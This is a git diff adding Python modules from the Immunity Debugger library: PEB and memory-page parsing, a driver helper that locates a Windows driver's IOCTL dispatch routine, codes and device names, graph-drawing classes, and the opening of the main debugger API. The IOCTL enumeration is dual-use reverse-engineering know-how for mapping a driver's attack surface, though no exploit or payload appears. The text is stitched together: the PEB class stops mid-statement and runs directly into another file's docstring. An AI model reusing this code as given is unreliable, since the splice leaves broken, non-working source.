+ @return: Page Memory
+ """
+ if not self.mem:
+ self.mem = self.imm.readMemory(self.baseaddress, self.size)
+ return self.mem
+
+ def getBaseAddress(self):
+ """
+ Get the Base Address of the Memory Page
+
+ @rtype: DWORD
+ @return: Base Address
+ """
+ return self.baseaddress
+
+ def getSection(self):
+ """
+ Get the Section from the Memory Page
+
+ @rtype: STRING
+ @return: Section
+ """
+ return self.section
+
+ def search(self, buf):
+ """
+ Search string in this memory page.
+
+ @param buf: Buffer to search for
+ @return: A list of address where the string was found on this memory page
+ """
+
+ self.getMemory()
+ if not self.mem:
+ return []
+ ndx = 0
+ find = []
+ buf_size = len(buf)
+ while 1:
+ f = self.mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + self.baseaddress )
+ ndx += f + buf_size
+ return find
+
+
+
+#PEB class (taken for bas's PDB)
+class PEB:
+ def __init__(self, imm):
+ """
+ Process Environment Block
+
+ @type imm: Debugger OBJECT
+ @param imm: Debugger
+ """
+ # PEB struct is 488 bytes (win2k) located at 0x7ffdf000
+ # can also use NTQueryProcessInformation to locate PEB base
+ self.base = imm.getPEBaddress()
+
+ try:
+ self.PEB = imm.readMemory(self.base, 488)
+ except:
+ error = "can't read PEB struct"
+ raise Exception, error
+
+ """
+ 0:000> !kdex2x86.strct PEB
+ Loaded kdex2x86 extension DLL
+ struct _PEB (sizeof=488)
+ +000 byte InheritedAddressSpace
+ +001 byte ReadImageFileExecOptions
+ +002 byte BeingDebugged
+ +003 byte SpareBool
+ +004 void *Mutant
+ +008 void *ImageBaseAddress
+ +00c struct _PEB_LDR_DATA *Ldr
+ +010 struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters
+ +014 void *SubSystemData
+ +018 void *ProcessHeap
+ +01c void *FastPebLock
+ +020 void *FastPebLockRoutine
+ +024 void *FastPebUnlockRoutine
+ +028 uint32 EnvironmentUpdateCount
+ +02c void *KernelCallbackTable
+ +030 uint32 SystemReserved[2]
+ +038 struct _PEB_FREE_BLOCK *FreeList
+ +03c uint32 TlsExpansionCounter
+ +040 void *TlsBitmap
+ +044 uint32 TlsBitmapBits[2]
+ +04c void *ReadOnlySharedMemoryBase
+ +050 void *ReadOnlySharedMemoryHeap
+ +054 void **ReadOnlyStaticServerData
+ +058 void *AnsiCodePageData
+ +05c void *OemCodePageData
+ +060 void *UnicodeCaseTableData
+ +064 uint32 NumberOfProcessors
+ +068 uint32 NtGlobalFlag
+ +070 union _LARGE_INTEGER CriticalSectionTimeout
+ +070 uint32 LowPart
+ +074 int32 HighPart
+ +070 struct __unnamed3 u
+ +070 uint32 LowPart
+ +074 int32 HighPart
+ +070 int64 QuadPart
+ +078 uint32 HeapSegmentReserve
+ +07c uint32 HeapSegmentCommit
+ +080 uint32 HeapDeCommitTotalFreeThreshold
+ +084 uint32 HeapDeCommitFreeBlockThreshold
+ +088 uint32 NumberOfHeaps
+ +08c uint32 MaximumNumberOfHeaps
+ +090 void **ProcessHeaps
+ +094 void *GdiSharedHandleTable
+ +098 void *ProcessStarterHelper
+ +09c uint32 GdiDCAttributeList
+ +0a0 void *LoaderLock
+ +0a4 uint32 OSMajorVersion
+ +0a8 uint32 OSMinorVersion
+ +0ac uint16 OSBuildNumber
+ +0ae uint16 OSCSDVersion
+ +0b0 uint32 OSPlatformId
+ +0b4 uint32 ImageSubsystem
+ +0b8 uint32 ImageSubsystemMajorVersion
+ +0bc uint32 ImageSubsystemMinorVersion
+ +0c0 uint32 ImageProcessAffinityMask
+ +0c4 uint32 GdiHandleBuffer[34]
+ +14c function *PostProcessInitRoutine
+ +150 void *TlsExpansionBitmap
+ +154 uint32 TlsExpansionBitmapBits[32]
+ +1d4 uint32 SessionId
+ +1d8 void *AppCompatInfo
+ +1dc struct _UNICODE_STRING CSDVersion
+ +1dc uint16 Length
+ +1de uint16 MaximumLength
+ +1e0 uint16 *Buffer
+ """
+ # init PEB struct
+ index = 0x000
+ self.InheritedAddressSpace = struct.unpack("B",self.PEB[index])[0]
+ index = 0x001
+ self.ReadImageFileExecOptions = struct.unpack("B",self.PEB[index])[0]
+ index = 0x002
+ self.BeingDebugged = struct.unpack("B",self.PEB[index])[0]
+ index = 0x003
+ self.SpareBool = struct.unpack("B",self.PEB[index])[0]
+ index = 0x004
+ self.Mutant = struct.unpack("} Debugger Driver Library for python
+
+
+"""
+
+__VERSION__ = '1.0'
+
+from immutils import *
+from immlib import *
+
+import struct
+
+class Driver:
+
+ def __init__(self):
+
+ # Globals
+ self.imm = Debugger()
+ self.IOCTLDispatchFunction = None
+ self.IOCTLDispatchFunctionAddress = 0x00000000
+ self.IOCTLCodes = []
+ self.IOCTLCodesLanding = {}
+ self.deviceNames = []
+ self.module = self.imm.getModule( self.imm.getDebuggedName() )
+
+ # Do some quick setup
+ if not self.module.isAnalysed:
+ self.imm.analyseCode( self.module.getCodebase() )
+
+
+ def getIOCTLCodes( self ):
+ """
+ Useful function to root out IOCTL codes from a driver.
+ This is also a big part of automating ioctlizer.
+
+ @rtype: List
+ @returns: List of all IOCTL codes that are supported by the driver.
+ """
+ if not self.IOCTLCodes:
+
+ if self.IOCTLDispatchFunction is None:
+ self.getIOCTLDispatch()
+
+ bb_list = self.IOCTLDispatchFunction.getBasicBlocks()
+
+ # Each IOCTL call has to do some setup first and then make a
+ # decision on the dwIoctlCode, so get the first basic block
+ # start disassembling from the end backwards
+ first_bb = bb_list[0]
+ instruction_list = first_bb.getInstructions( self.imm )[::-1]
+
+ term_jmp_found = False
+ first_ioctl_code = None
+
+ for instruction in instruction_list:
+
+ inst_string = instruction.getResult()
+
+ # We first confirm that we are terminated by a conditional
+ # jump so that we can now look for a CMP/SUB with a constant
+ # that will contain the IOCTL code
+ if not term_jmp_found and instruction.isConditionalJmp():
+ term_jmp_found = True
+ continue
+
+ if "CMP" in inst_string or "SUB" in inst_string and term_jmp_found:
+ ioctl_code = instruction.getImmConst()
+ self.imm.log("First IOCTL code: 0x%08x" % int(ioctl_code))
+
+ first_ioctl_code = int(ioctl_code)
+ break
+
+
+ # Now we put ourselves into a dissasembling frenzy
+ # A CMP instruction means we don't modify the IOCTL code
+ # A SUB/ADD instruction means we have to adjust the IOCTL code before storing it
+ self.IOCTLCodes.append( first_ioctl_code )
+ self.IOCTLCodesLanding[ first_ioctl_code ] = bb_list[0].getTrueEdge()
+
+ base_register = instruction.getOperandRegister(0)
+
+ # We aren't interested in the True edge, that's for the
+ # already discovered first_ioctl_code
+ continue_search = True
+ current_bb = bb_list[0]
+
+ # Just key a dict with the bb heads for quick access later
+ basic_block_head_addresses = {}
+ for bb in bb_list:
+ basic_block_head_addresses[bb.getStart()] = bb
+
+ modifier = first_ioctl_code
+ reg_modifier = None
+ reg_modifier_value = 0
+
+ while continue_search:
+
+ false_edge = current_bb.getFalseEdge()
+ if false_edge is None:
+ break
+
+ current_bb = basic_block_head_addresses[ false_edge ]
+ instruction_list = current_bb.getInstructions( self.imm )
+
+ # Now we have the false edge in the list let's
+ # check for our IOCTL comparisons
+ for instruction in instruction_list:
+
+ # Something is being done TO the base_register
+ if base_register == instruction.getOperandRegister(0):
+
+ # Ok now we know that our base register is being
+ # either compared or manipulated
+ inst_string = instruction.getResult()
+
+ const = instruction.getImmConst()
+ const_found = False
+
+ # This means we have a valid constant being used
+ # otherwise we need to track down the register being used.
+ if "CMP" in inst_string:
+ self.IOCTLCodes.append( const )
+ self.IOCTLCodesLanding[ const ] = current_bb.getTrueEdge()
+ break
+
+ if "SUB" in inst_string:
+
+ # We have tracked a modifier that's been assigned to
+ # a register that's being subtracted from our IOCTL code
+ if reg_modifier is not None:
+
+ if instruction.getOperandRegister(1) == reg_modifier and instruction.getOperandRegister(0) == base_register:
+ const = reg_modifier_value
+ const_found = True
+ self.imm.log("Reg modifier check: 0x%08x" % reg_modifier_value)
+
+ # Check to make sure we aren't modifying the modifier :)
+ if instruction.getOperandRegister(1) == reg_modifier and instruction.getImmConst() != 0:
+ reg_modifier_value = reg_modifier_value - instruction.getImmConst()
+ const_found = True
+ self.imm.log("Reg modifier check 2")
+
+ if not const and not const_found:
+ # K now we gotta track down that pesky register
+ reg_modifier = instruction.getOperandRegister(1)
+
+ # Now we disassemble backwards looking for a constant
+ rev_instruction_list = instruction_list[::-1]
+
+ for search_instruction in instruction_list:
+ mod_constant = search_instruction.getImmConst()
+
+ if mod_constant:
+ reg_modifier_value = mod_constant
+ const = mod_constant
+ break
+
+ self.imm.log("Address: 0x%08x" % instruction.getAddress(), address = instruction.getAddress() )
+
+ modifier = modifier - const
+ self.IOCTLCodes.append( modifier )
+ self.IOCTLCodesLanding[ modifier ] = current_bb.getTrueEdge()
+ break
+
+ # Now pretty print them out
+ for ioctl_code in self.IOCTLCodes:
+ self.imm.log("IOCTL Code: 0x%08x" % ioctl_code)
+
+ return self.IOCTLCodes
+
+ def getDeviceNames( self ):
+ """
+ Attempts to discover all registered device symbolic links
+ which are how usermode talks to the driver.
+
+ @rtype: List
+ @return: List of all possible devices names.
+ """
+
+ string_list = self.imm.getReferencedStrings( self.module.getCodebase() )
+
+ for entry in string_list:
+ if "\\Device\\" in entry[2]:
+ self.imm.log("Possible match at address: 0x%08x" % entry[0], address = entry[0] )
+ self.deviceNames.append( entry[2].split("\"")[1] )
+
+
+ self.imm.log("Possible device names: %s" % self.deviceNames)
+
+ return self.deviceNames
+
+
+ def getIOCTLDispatch( self ):
+ """
+ Locates the primary dispatch function for handling IOCTLs from
+ userland.
+
+ @rtype: Function object
+ @return: Function object.
+ """
+
+ # The IOCTL dispatch is always located at MOV DWORD PTR [R32+0x70], CONST
+ search_pattern = "MOV DWORD PTR [R32+70],CONST"
+
+ dispatch_address = self.imm.searchCommandsOnModule( self.module.getCodebase(), search_pattern )
+
+ # We have to weed out some possible bad matches
+ for address in dispatch_address:
+
+ instruction = self.imm.disasm( address[0] )
+
+ if "MOV DWORD PTR" in instruction.getResult():
+ if "+70" in instruction.getResult():
+ self.IOCTLDispatchFunctionAddress = instruction.getImmConst()
+ self.IOCTLDispatchFunction = self.imm.getFunction( self.IOCTLDispatchFunctionAddress )
+ break
+
+ if not self.IOCTLDispatchFunctionAddress and not self.IOCTLDispatchFunction:
+ # If that first loop fails, then we start walking the driver
+ # until we freakin' find it, slow but accurate
+ function_list = self.imm.getAllFunctions( self.module.getCodebase() )
+
+ for function in function_list:
+
+ bb_list = self.imm.getFunction( function ).getBasicBlocks()
+
+ for bb in bb_list:
+ instruction_list = bb.getInstructions( self.imm )
+
+ for instruction in instruction_list:
+
+ if "MOV DWORD PTR" in instruction.getResult():
+ if "+70" in instruction.getResult():
+ self.IOCTLDispatchFunctionAddress = instruction.getImmConst()
+ self.IOCTLDispatchFunction = self.imm.getFunction( self.IOCTLDispatchFunctionAddress )
+ break
+
+ if self.IOCTLDispatchFunction:
+ self.imm.log("Dispatch address: 0x%08x" % self.IOCTLDispatchFunctionAddress, address = self.IOCTLDispatchFunctionAddress )
+ else:
+ self.imm.log("Couldn't find an IOCTL dispatch routine. Driver may not support usermode calls in this manner.")
+
+
+ return self.IOCTLDispatchFunction
+
+ def printDriverReport( self ):
+ """
+ This simply runs all of the functions and outputs as much information as it
+ can gather about the driver, spits it all out into the log window and
+ drops a text file called driver_name_report.txt with all of the information.
+ """
+ # TODO: make this do what i said it's gonna do
+ self.getIOCTLDispatch()
+
+ if self.IOCTLDispatchFunctionAddress:
+ self.getIOCTLCodes()
+
+ self.getDeviceNames()
+
+ fd = open("%s.txt" % self.imm.getDebuggedName(), "w")
+
+ self.imm.log("=" * 512)
+ fd.write("=" * 512)
+ fd.write("\n")
+
+ msg = "Driver Report for: %s (Version: %s)" % ( self.imm.getDebuggedName(), self.module.getVersion() )
+ self.imm.log("%s" % msg)
+ self.imm.log("")
+ fd.write( msg + "\n\n")
+
+ msg = "Discovered Device Names:"
+ self.imm.log("%s" % msg)
+ fd.write( msg + "\n")
+
+ for device_name in self.deviceNames:
+ self.imm.log( "%s" % device_name)
+ fd.write( device_name + "\n" )
+ self.imm.log("")
+ fd.write("\n")
+
+ if self.IOCTLDispatchFunctionAddress:
+ msg = "IOCTL Dispatch located at: 0x%08x (+%08x)" % ( self.IOCTLDispatchFunctionAddress, (self.IOCTLDispatchFunctionAddress - self.module.getBase() ) )
+ self.imm.log("%s" % msg, address = self.IOCTLDispatchFunctionAddress)
+ self.imm.log("")
+ fd.write( msg + "\n\n")
+
+ msg = "IOCTL Codes:"
+ self.imm.log("%s" % msg)
+ self.imm.log("")
+ fd.write( msg + "\n\n")
+
+ for ioctl_code in self.IOCTLCodes:
+
+ msg = "0x%08x" % ioctl_code
+ self.imm.log("%s" % msg)
+ fd.write( msg + "\n")
+
+ self.imm.log("")
+ fd.write("\n")
+
+ msg = "IOCTL Codes Landing Basic Blocks ( IOCTL CODE => Landing Address ( Relative Offset ) ):"
+ self.imm.log("%s" % msg)
+ self.imm.log("")
+ fd.write( msg + "\n\n")
+
+ for ioctl_code in self.IOCTLCodes:
+
+ msg = "0x%08x => 0x%08x (+%08x)" % ( ioctl_code, self.IOCTLCodesLanding[ ioctl_code ], ( self.IOCTLCodesLanding[ ioctl_code ] - self.module.getBase() ) )
+ self.imm.log("%s" % msg, address = self.IOCTLCodesLanding[ ioctl_code ] )
+ fd.write( msg + "\n")
+
+ self.imm.log("")
+ fd.write("\n")
+
+
+
+
+ fd.close()
+ return
\ No newline at end of file
diff --git a/1.73/Libs/graphclass.py b/1.73/Libs/graphclass.py
new file mode 100755
index 0000000..41e22f8
--- /dev/null
+++ b/1.73/Libs/graphclass.py
@@ -0,0 +1,449 @@
+#!/usr/bin/env python
+"""
+Immunity Debugger Graph Lib
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Graph API
+
+
+"""
+
+__version__ = '1.1'
+
+import debugger
+
+#colors from graphics.hpp
+
+ImmDrawColors = {"Black":0,"Maroon":128,"Green":32768,"Olive":32896,"Navy":8388608,"Purple":8388736,"Teal":8421376,\
+ "Gray":8421504,"Silver":12632256,"Red":255,"Lime":65280,"Yellow":65535,"Blue":16711680,"Fuchsia":16711935,\
+ "Aqua":16776960,"LightGray":12632256,"DarkGray":8421504,"White":16777215,"MoneyGreen":12639424,\
+ "SkyBlue":15780518,"Cream":15793151,"MedGray":10789024,"red":255,"darkgreen":32768}
+
+
+
+class Graph:
+ def __init__(self):
+ self.vertices=[]
+ self.edges=[]
+ self.nvertices=0
+ self.nedges=0
+ self.handler=0
+ self.height=0
+ self.width=0
+
+
+ def setHandler(self,handler):
+ self.handler=handler
+
+ def addVertices(self,vertices):
+ self.vertices=vertices
+
+ def getVertices(self):
+ return self.vertices
+
+ def addEdges(self,edges):
+ """edges[0] = source
+ edges[1] = target
+ edges[3] = type
+ type can be one of:
+ Direct = 0
+ True = 1
+ False = 2"""
+ self.edges.append(edges)
+
+ def getEdges(self):
+ return self.edges
+
+ def getNEdges(self):
+ self.nedges=len(self.edges)
+ return self.nedges
+
+ def getNVertices(self):
+ self.nvertices=len(self.vertices)
+ return self.nvertices
+
+ def splashTime(self):
+ return debugger.Splashtime(self.handler,self.height,self.width)
+
+
+ def setBitSize(self,vertices):
+ fy2=fx2=fx=fy=0
+ for vertex in vertices:
+ (x,y,x2,y2)=vertex.getCoords()
+ if y2>fy2:
+ fy2=y2
+ if x2 > fx2:
+ fx2=x2
+ if y < fy:
+ fy=y
+ if x < fx:
+ fx=x
+ self.height=fy2 + 200
+ self.width = fx2 + 400 + abs(fx)
+ vertices[0].setStartCoords(self.height,self.width)
+
+ def getBitSize(self):
+ return (self.height,self.width)
+
+
+
+
+
+
+
+
+
+
+class Vertex:
+ def __init__(self,handler):
+ self.inadj=[]
+ self.outadj=[]
+ self.name=""
+ self.label=""
+ self.buf=[]
+ #size is represented by absolute coords (x,y)
+ self.absy=0
+ self.absx=0
+ self.handler=handler
+ self.x1=0
+ self.y1=0
+ self.x2=0
+ self.y2=0
+ self.rely=0
+ self.relx=0
+ self.color="Black"
+ self.texth=0
+ self.textw=0
+ self.drawn=False
+ self.placed=False
+ self.start_x=300
+ self.start_y=10
+
+ def __cmp__(self, other):
+ return cmp(self.y2, other.y2)
+
+
+ def addInAdj(self,edge):
+ self.inadj.append(edge)
+
+ def addOutAdj(self,edge,type):
+ """type can be one of:
+ Direct = 0
+ True = 1
+ False = 2
+ """
+ self.outadj.append((edge,type))
+
+ def getOutAdj(self):
+ return self.outadj
+
+ def getInAdj(self):
+ return self.inadj
+
+
+ def setName(self,name):
+ self.name=name
+
+ def getName(self):
+ return self.name
+
+ def setLabel(self,label):
+ self.label=label
+
+ def getLabel(self):
+ return self.label
+
+ def setVertexBuffer(self,buf):
+ self.buf=buf
+
+ def getVertexBuffer(self):
+ return self.buf
+
+ def setRelPos(self,x,y):
+ self.relx=x
+ self.rely=y
+
+ def getRelPos(self):
+ return (self.relx,self.rely)
+
+ def setPlaced(self):
+ self.placed=True
+
+ def isPlaced(self):
+ """returns True if vertex was already placed into the plane"""
+ return self.placed
+
+ def calculateAbsoluteSize(self,text):
+ theight=0
+ for line in text:
+ (twidth,theight)=debugger.Gettextsize(self.handler,line)
+ if twidth > self.absx:
+ self.absx=twidth
+ self.absy=self.absy+theight
+ self.absy=self.absy+4
+ self.absx=self.absx+10
+
+
+ def getAbsoluteSize(self):
+ return (self.absx,self.absy)
+
+ def getHeight(self):
+ return self.absy
+
+ def getWidth(self):
+ return self.absx
+
+ def getCoords(self):
+ self.x2 = self.getWidth() + self.relx
+ self.y2 = self.getHeight() + self.rely
+ return (self.relx,self.rely,self.x2,self.y2)
+
+ def getY2(self):
+ return self.y2
+
+ def getX(self):
+ return self.relx
+
+ def getY(self):
+ return self.rely
+
+ def getX2(self):
+ return self.x2
+
+ def getCoordsWithMargin(self):
+ self.x2 = self.getWidth() + self.relx
+ self.y2 = self.getHeight() + self.rely
+ return (self.relx,self.rely,self.x2,self.y2)
+
+ def setDrawn(self):
+ self.drawn=True
+
+ def isDrawn(self):
+ return self.drawn
+
+ def moveNorth(self,value):
+ self.rely=self.rely - value
+ return
+
+ def moveSouth(self,value):
+ self.rely=self.rely + value
+ return
+
+ def moveEast(self,value):
+ self.relx = self.relx + value
+ return
+
+ def moveWest(self,value):
+ self.relx = self.relx - value
+ return
+
+ def placeVertex(self,x,y,text,textcolor,rectcolor,start):
+ theight=0
+ self.texth=0
+ self.textw=0
+ f=open("ea.txt","w+")
+ for line in text:
+ if text.index(line) == 0:
+ #title
+ (theight,twidth)=debugger.Drawtext(self.handler,x,y+self.texth,line+":",ImmDrawColors["Purple"])
+ if twidth > self.textw:
+ self.textw=twidth
+ self.texth=self.texth+theight
+ else:
+ line = line.replace("\x0a","").replace("\x0d","")
+ #split asm from comment
+ try:
+ asmline=line.split("||")[0]
+ commentline=line.split("||")[1]
+ (theight,twidth)=debugger.Drawtext(self.handler,x,y+self.texth," " +asmline,ImmDrawColors[textcolor])
+ (theight,twidth2)=debugger.Drawtext(self.handler,x+twidth,y+self.texth," " +commentline,ImmDrawColors["Red"])
+ twidth+=twidth2
+
+ except:
+ (theight,twidth)=debugger.Drawtext(self.handler,x,y+self.texth," " +line,ImmDrawColors[textcolor])
+ if twidth > self.textw:
+ self.textw=twidth
+ self.texth=self.texth+theight
+
+ #left
+ debugger.Drawline(self.handler,x-5,y-3,x-5,y+self.texth+2,ImmDrawColors[rectcolor],start) #mark graph start
+ #right
+ debugger.Drawline(self.handler,x+self.textw+5,y-2,x+self.textw+5,y+self.texth+2,ImmDrawColors[rectcolor])
+ #top
+ debugger.Drawline(self.handler,x-6,y-3,x+self.textw+5,y-2,ImmDrawColors[rectcolor])
+ #bottom
+ debugger.Drawline(self.handler,x-6,y+self.texth+2,x+self.textw+5,y+self.texth+2,ImmDrawColors[rectcolor])
+ return None
+
+ def addEndPoint(x,y,color):
+ debugger.Drawline(self.handler,x,y,x,y+3,ImmDrawColors[color])
+ debugger.Drawline(self.handler,x,y,x,y-3,ImmDrawColors[color])
+ debugger.Drawline(self.handler,x,y,x+3,y+3,ImmDrawColors[color])
+ debugger.Drawline(self.handler,x,y,x-3,y+3,ImmDrawColors[color])
+ debugger.Drawline(self.handler,x,y,x+3,y-3,ImmDrawColors[color])
+ debugger.Drawline(self.handler,x,y,x-3,y-3,ImmDrawColors[color])
+ return
+
+ def setStartCoords(self,height,width):
+ self.start_x=width/2
+ self.start_y=10
+
+
+ def getStartCoords(self):
+ return (self.start_x,self.start_y)
+
+
+
+class Draw:
+ def __init__(self):
+ """ Initialize the Drawing class"""
+ self.title=""
+ self.start_address=0
+ self.handler=0
+ self.edgeproperties=[]
+
+ def createGraphWindow(self,title,start_address):
+ self.title=title
+ self.start_address=int(start_address,16)
+ self.handler=debugger.Creategraphwindow(title,self.start_address)
+ return self.handler
+
+
+ def getTitle(self):
+ return self.title
+
+ def getHandler(self):
+ return self.handler
+
+ def setEdgeProperties(self,properties):
+ """ properties: { sourcename: "5" ,targetname: "6" ,label: "false", color: red }
+ """
+ self.edgeproperties.append(properties)
+
+
+ def getEdgeProperties(self):
+ return self.edgeproperties
+
+
+
+class Line:
+ def __init__(self,handler):
+ """ Initialize the Line class"""
+ self.x_pos=0
+ self.y_pos=0
+ self.x_to=0
+ self.y_to=0
+ self.color="Black"
+ self.handler=handler
+
+ def draw(self,x_pos,y_pos,x_to,y_to,color):
+ self.x_pos=x_pos
+ self.y_pos=y_pos
+ self.x_to=x_to
+ self.y_to=y_to
+ self.color=color
+ return debugger.Drawline(self.handler,self.x_pos,self.y_pos,self.x_to,self.y_to,ImmDrawColors[self.color])
+
+
+ def getCoords(self):
+ return (self.x_pos,self.y_pos,self.x_to,self.y_to)
+
+ def getColor(self):
+ return self.color
+
+ def getHandle(self):
+ return self.handle
+
+
+
+class vcgNode:
+ def __init__(self,handler):
+ """ Initialize the Recttext class"""
+ self.x1=0
+ self.y1=0
+ self.x2=0
+ self.y2=0
+ self.rely=0
+ self.relx=0
+ self.color="Black"
+ self.text=""
+ self.texth=0
+ self.textw=0
+ self.absy=0
+ self.absx=0
+ self.handler=handler
+ self.title=""
+ self.label=""
+ self.nodebuf=[]
+ self.child=[]
+
+
+ def drawText(self,x,y,text,color):
+ debugger.Error("e")
+ theight=0
+ for line in text:
+ #separate asm from comment
+ asmline=line.split("||")[0]
+ commentline=line.split("||")[1]
+ debugger.Error("asm: %s\ncomment: %s" % (asmline,commentline))
+ (theight,twidth)=debugger.Drawtext(self.handler,x,y+self.texth,asmline,ImmDrawColors[color])
+ (theight,twidth2)=debugger.Drawtext(self.handler,x+twidth,y+self.texth,commentline,ImmDrawColors["Red"])
+ twidth+=twidth2
+ if twidth > self.textw:
+ self.textw=twidth
+ self.texth=self.texth+theight
+ return None
+
+ def drawRect(self,x1,y1,x2,y2,color):
+ self.x1=x1
+ self.y1=y1
+ self.x2=x2
+ self.y2=self.y2
+ self.color=color
+ return debugger.Drawrectangle(self.handler,x1,y1,x2,y2,ImmDrawColors[self.color])
+
+ def setTitle(self,title):
+ self.title=title
+
+ def getTitle(self):
+ return self.title
+
+ def setLabel(self,label):
+ self.label=label
+
+ def getLabel(self):
+ return self.label
+
+ def setNodeBuffer(self,buf):
+ self.nodebuf=buf
+
+ def getNodeBuffer(self):
+ return self.nodebuf
+
+
+
+ def getAbsSize(self,text):
+ theight=0
+ self.absy=0
+ self.absx=0
+ for line in text:
+ (twidth,theight)=debugger.Gettextsize(self.handler,line)
+ if twidth > self.absx:
+ self.absx=twidth
+ self.absy=self.absy+theight
+ return (self.absy+4,self.absx+10)
+
+ def setChild(self,child):
+ self.child.append(child)
+
+ def getChild(self):
+ return self.child
+
+ def setRelPos(self,x,y):
+ self.relx=x
+ self.rely=y
+
+ def getRelPos(self):
+ return (self.relx,self.rely)
diff --git a/1.73/Libs/immlib.py b/1.73/Libs/immlib.py
new file mode 100755
index 0000000..6d9a0dd
--- /dev/null
+++ b/1.73/Libs/immlib.py
@@ -0,0 +1,3096 @@
+#!/usr/bin/env python
+"""
+ Immunity Debugger API for python
+
+ (c) Immunity, Inc. 2004-2007
+
+
+ U{Immunity Inc.} Debugger API for python
+
+
+ """
+
+__VERSION__ = '1.3'
+
+
+import debugger
+import immutils
+import string
+import time
+import struct
+import pickle
+import cPickle
+import libheap
+
+from libhook import *
+from libevent import *
+from debugtypes import *
+from libanalyze import *
+from librecognition import FunctionRecognition
+from libcontrolflow import ControlFlowAnalysis
+
+# CONSTANT
+BpKeys = {"VK_F2": 0x71, "VK_F4" : 0x73}
+BpFlags = {"TY_STOPAN": 0x80L, "TY_SET": 0x100L, "TY_ACTIVE": 0x200L, "TY_DISABLED":0x400,\
+ "TY_ONESHOT": 0x800L, "TY_TEMP":0x1000L, "TY_KEEPCODE":0x2000L, "TY_KEEPCOND": 0x4000L,\
+ "TY_NOUPDATE":0x8000, "TY_RTRACE": 0x10000}
+
+# Hardware breakpoint type flags
+
+HB_FREE=0 # Breakpoint is not used
+HB_CODE=1 # Active on command execution
+HB_ACCESS=2 # Active on read/write access
+HB_WRITE=3 # Active on write access
+HB_IO=4 # Active on port I/O
+HB_ONESHOT=5 # One-shot on command execution
+HB_STOPAN=6 # One-shot on command and stop
+HB_TEMP=7 # Temporary on command execution
+
+DebugerStatus = { "NONE":0, "STOPPED":1, "EVENT":2, "RUNNING": 3, "FINISHED":4, "CLOSING":5 }
+
+Register = { "EAX" : 0 , "ECX" : 1, "EDX": 2, "EBX": 3, "ESP": 4, "EBP": 5, "ESI": 6, "EDI": 7, "EIP":8}
+
+PageFlags = {0x1 : " ",0x2: "R ", 0x4:"RW ", 0x8: "RW COW", 0x10: " E",\
+ 0x20: "R E", 0x40: "RWE", 0x80: "RWE COW"}
+
+ImmFonts = {"fixed": 0, "terminal6": 1, "fixedsys":2, "courier":3, "lucida":4, "font5": 5,\
+ "font6": 6, "font7":7, "main": 8, "sys": 9, "info": 10}
+
+
+
+BpMemFlags = {"R": 0x1, "W":0x2, "S":0x1000L}
+
+MemoryProtection = { "PAGE_EXECUTE" :0x10, "PAGE_EXECUTE_READ" :0x20 , "PAGE_EXECUTE_READWRITE": 0x40,\
+ "PAGE_EXECUTE_WRITECOPY":0x80, "PAGE_NOACCESS":0x01, "PAGE_READONLY":0x02,\
+ "PAGE_READWRITE":0x04, "PAGE_WRITECOPY": 0x08 }
+
+
+
+IgnoreSingleStep = {"DISABLE" : 0 , "FORCE" : 1 , "CONTINUE" : 2}
+
+
+
+#define JT_JUMP 0 // Unconditional jump
+#define JT_COND 1 // Conditional jump
+#define JT_SWITCH 2 // Jump via switch table
+#define JT_CALL 3 // Local (intramodular) call
+#define CALL_INTER 4 // intermodular call
+jmpTypeFlags = {"JUMP":0,\
+ "JUMP_COND":1,\
+ "JUMP_SWITCH":2,\
+ "CALL":3,\
+ "CALL_INTER":4}
+
+
+NM_NONAME=0x00 # Undefined name
+NM_MODSEARCH=0xFD
+NM_ANYNAME=0xFF # Name of any type
+#Names saved in the data file of module they appear.
+NM_PLUGCMD=0x30 # Plugin commands to execute at break
+NM_LABEL=0x31 # User-defined label
+NM_EXPORT=0x32 # Exported (global) name
+NM_IMPORT=0x33 # Imported name
+NM_LIBRARY=0x34 # Name from library or object file
+NM_CONST=0x35 # User-defined constant
+NM_COMMENT=0x36 # User-defined comment
+NM_LIBCOMM=0x37 # Comment from library or object file
+NM_BREAK=0x38 # Condition related with breakpoint
+NM_ARG=0x39 # Arguments decoded by analyzer
+NM_ANALYSE=0x3A # Comment added by analyzer
+NM_BREAKEXPR=0x3B # Expression related with breakpoint
+NM_BREAKEXPL=0x3C # Explanation related with breakpoint
+NM_ASSUME=0x3D # Assume function with known arguments
+NM_STRUCT=0x3E # Code structure decoded by analyzer
+NM_CASE=0x3F # Case description decoded by analyzer
+#Names saved in the data file of main module.
+NM_INSPECT=0x40 # Several last inspect expressions
+NM_WATCH=0x41 # Watch expressions
+NM_ASM=0x42 # Several last assembled strings
+NM_FINDASM=0x43 # Several last find assembler strings
+NM_LASTWATCH=0x48 # Several last watch expressions
+NM_SOURCE=0x49 # Several last source search strings
+NM_REFTXT=0x4A # Several last ref text search strings
+NM_GOTO=0x4B # Several last expressions to follow
+NM_GOTODUMP=0x4C # Several expressions to follow in Dump
+NM_TRPAUSE=0x4D # Several expressions to pause trace
+#Names saved in the data file of debugged DLL.
+NM_DLLPARMS=0x50 # (10 parms + 6 regs) x 10-line history
+#Names that are not saved in the data file.
+NM_DEBUG=0x80 # Names from debug data
+NM_IMPLIB=0x81 # Names of import library files
+NM_IMPNAME=0x82 # Names of import library entries
+NM_FONT=0x83 # Names of fonts
+NM_SCHEME=0x84 # Names of colour schemes
+NM_GOTOSTACK=0x85 # Several expressions to follow in Stack
+NM_HILITE=0x86 # Names of highlighting schemes
+#Pseudonames.
+NM_IMCALL=0xFE # Intermodular call
+
+
+import UserDict
+
+# Dict that returns classess
+class DictTypes(UserDict.IterableUserDict):
+ def __init__(self):
+ UserDict.IterableUserDict.__init__(self)
+ def __iter__(self):
+ for k in self.data.keys():
+ yield self.data[k]
+
+
+ImmDrawColors = {"Black":0,"Maroon":128,"Green":32768,"Olive":32896,"Navy":8388608,"Purple":8388736,"Teal":8421376,\
+ "Gray":8421504,"Silver":12632256,"Red":255,"Lime":65280,"Yellow":65535,"Blue":16711680,"Fuchsia":16711935,\
+ "Aqua":16776960,"LightGray":12632256,"DarkGray":8421504,"White":16777215,"MoneyGreen":12639424,\
+ "SkyBlue":15780518,"Cream":15793151,"MedGray":10789024,"red":255,"darkgreen":32768}
+
+###########################
+###########################
+### Debugger main class ###
+###########################
+###########################
+class Debugger:
+ def __init__(self):
+ """ Initialize the Immunity Debugger API"""
+ self.threadid = 0
+ os = self.getOsInformation()
+ self.ossystem = os[ 0 ].lower()
